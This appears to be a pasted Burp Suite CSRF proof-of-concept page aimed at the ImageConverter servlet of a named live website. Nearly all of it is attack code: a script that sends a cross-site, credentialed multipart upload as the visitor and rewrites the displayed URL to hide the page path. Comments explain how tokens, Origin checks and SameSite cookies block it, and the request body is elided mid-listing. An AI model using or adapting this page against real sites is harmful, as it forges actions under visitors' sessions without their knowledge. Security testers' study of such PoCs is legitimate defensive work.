
Untitled

a guest Sep 14th, 2018 52 Never
  1. <html>
  2.   <!-- CSRF PoC - generated by Burp Suite Professional
            Tests whether the ImageConverter servlet accepts a cross-site multipart POST
            (file field "fname") sent with the visitor's credentials.
            The listing is elided at line 19 ("...."), so it is incomplete as pasted.
            Defender notes:
            - The request can only change state if the endpoint trusts ambient cookies alone;
              a per-session anti-CSRF token or a server-side Origin/Referer check rejects it.
            - Session cookies marked SameSite=Lax or SameSite=Strict are not attached to a
              cross-site XHR POST like this one.
            - NOTE(review): the three request headers set below look CORS-safelisted, so a
              preflight is probably not triggered; do not rely on CORS to block the write.
       -->
  3.   <body>
       <!-- Rewrites the displayed URL path to "/" without reloading the page. -->
  4.   <script>history.pushState('', '', '/')</script>
       <!-- submitRequest(): opens an asynchronous POST with withCredentials = true, builds the
            multipart body as a string, copies each character code into a Uint8Array so bytes
            such as \x89 are sent unchanged, and sends the result as a Blob. -->
  5.     <script>
  6.       function submitRequest()
  7.       {
  8.         var xhr = new XMLHttpRequest();
  9.         xhr.open("POST", "https:\/\/www.online-utility.org\/servlet\/ImageConverter", true);
  10.         xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
  11.         xhr.setRequestHeader("Accept-Language", "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3");
  12.         xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------206860758214748693911873600863");
  13.         xhr.withCredentials = true;
  14.         var body = "-----------------------------206860758214748693911873600863\r\n" +
  15.           "Content-Disposition: form-data; name=\"fname\"; filename=\"Logo_sstic_transp.png\"\r\n" +
  16.           "Content-Type: image/png\r\n" +
  17.           "\r\n" +
  18.           "\x89PNG\r\n" +
  19. ....
  20.           "-----------------------------206860758214748693911873600863--\r\n";
  21.         var aBody = new Uint8Array(body.length);
  22.         for (var i = 0; i < aBody.length; i++)
  23.           aBody[i] = body.charCodeAt(i);
  24.         xhr.send(new Blob([aBody]));
  25.       }
  26.     </script>
       <!-- Manual trigger: the request is sent only when the button is clicked. -->
  27.     <form action="#">
  28.       <input type="button" value="Submit request" onclick="submitRequest();" />
  29.     </form>
  30.   </body>
  31. </html>